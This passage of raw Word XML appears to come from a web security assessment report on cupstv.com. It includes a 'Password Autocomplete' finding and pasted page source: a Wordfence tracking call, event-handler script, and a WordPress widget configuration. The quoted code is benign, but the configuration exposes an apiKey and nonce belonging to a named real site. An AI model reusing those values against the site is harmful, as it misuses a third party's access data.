          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>})(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>'//cupstv.com/?wordfence_logHuman=1&amp;hid=CC5FC686989A7374EF28EC6BCE8CE445');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83E0DE" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C"/>
    <w:p w14:paraId="6A56A84C" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="19834AFF" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="5CE0D4E1" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="38539714" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="79D79DD9" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="5FCF87E3" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="379D0B9F" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="1ED3ABC7" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="3971C30A" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="5C5436FD" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="25CE7861" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="7CECED5D" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="285AF79B" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Password Autocomplete </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D9C1A9" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0"/>
    <w:p w14:paraId="70E74DC1" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="149C5910" wp14:editId="4D1183A4">
            <wp:extent cx="6154615" cy="3249822"/>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assword Auto Complete.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6162603" cy="3254040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="749ECB63" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/* &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>![</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>CDATA[ */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED92EC" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>WuWidget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = {"apiKey":"3ffab52910ec1a0e","_wpnonce":"cb605db8b7","ajaxurl":"http:\/\/cupstv.com\/wp-admin\/admin-ajax.php","is_admin":"","subdomain":"www"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572A283F" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>WuWidget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = {"apiKey":"3ffab52910ec1a0e","_wpnonce":"cb605db8b7","ajaxurl":"http:\/\/cupstv.com\/wp-admin\/admin-ajax.php","is_admin":"","subdomain":"www"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756E1CA" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/* ]]&gt; */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B20C140" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A276F0" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB9A1FD" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658847B7" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>addEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>, handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38342B65" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window.addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44719B75" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>document.addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>, handler, false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565A235" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window.attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370CA8C4" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>document.attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">'on' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>, handler);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3350D" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2507295D" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA8F28" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>removeEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>, handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2B81D" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window.removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE0E6C" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>document.removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>, handler, false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C0F90" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window.detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DE859" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>document.detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">'on' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>, handler);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40375A6D" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2694D500" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC2CD4" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>contextmenu</w:t>
      </w:r>
